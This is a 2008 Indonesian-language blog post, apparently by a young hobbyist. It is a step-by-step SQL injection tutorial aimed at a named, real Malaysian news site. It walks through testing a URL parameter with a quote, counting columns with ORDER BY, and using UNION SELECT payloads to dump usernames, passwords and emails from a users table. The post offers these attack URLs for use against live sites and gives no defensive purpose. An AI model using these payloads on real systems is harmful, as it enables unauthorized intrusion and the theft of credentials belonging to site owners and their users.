Wednesday, December 03, 2008

SQL Injection ( web malay )

Web target sudah di patch......
Terima Kasih
============================================================
Tool :
1. Mozilla, IE
2. Komputer yang konek ke internet
Perlengkapan laen (gak wajib) :1. Secangkir kopi
2. Foto cewek cakep di samping komputer...
3. Keuletan....



1. Cari target
Contoh targer:contoh: http://taseen.com.my/news/news.php?id=3


2. Cek lubang dengan menambahkan ' pada url
Contoh: contoh: http://taseen.com.my/news/news.php?id=3'

Jika terjadi pesan eror maka web tersebut berlubang.... hore..hehehe


3. Sekarang kasi perintah order ampe ada pesan eror , sebelumnya .... setelah = silahkan tambahkan -
jadi urlnya:contoh: http://taseen.com.my/news/news.php?id=-3

Sekarang silahkan kasi order ampe ketemu error....
Contoh:

http://taseen.com.my/news/news.php?id=3 order by 1/* <---- gak ada eror http://taseen.com.my/news/news.php?id=3 order by 2/* <---- gak ada eror http://taseen.com.my/news/news.php?id=3 order by 3/* <---- gak ada eror http://taseen.com.my/news/news.php?id=3 order by 4/* <---- gak ada eror http://taseen.com.my/news/news.php?id=3 order by 5/* <---- ada eror bahwa web tersebut punya 4 colom....

4 Sekarang masukkan perintah unoin all select 1,2,3,4/* <<<--- serupakan colom yang ada dallam web tersebut contoh: http://taseen.com.my/news/news.php?id=-3 union all select 1,2,3,4/*

Maka akan keluar angka , misal angka yang keluar adalah 3 ,Angka yang keluar pada nantinya diganti dengan nama colom atau perintah sql.... spt: @@version untuk mengecek versi

5. Sekarang mari kita tebak colom dan tabelnya.....
nama tabel: users/* admin/* members/* dll nama colom: user_name , user-d, user_is, username, password, pass dll

Sekarang kita coba username
http://taseen.com.my/news/news.php?id=-3 union select all 1,2,username,4 from users/* jreng jreng...... usernya keliatan.......

Sekarang coba passwordnya.....
http://taseen.com.my/news/news.php?id=-3 union select all 1,2,password,4 from users/* jreng jreng..... passwordnya keliatan juga....

Sekarang kta coba dua duanya
http://taseen.com.my/news/news.php?id=-3 union select all 1,2,concat(username,0x3a,password,0x3a,email),4 from users/*

jreng jreng.... user n passwordnya keliatan.... Selesei deh...... dah dulu ya... mau belajar dulu... maklum masih smp...kwkwkwkw...
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)
Locations of visitors to this page
DROP ME A MSG :D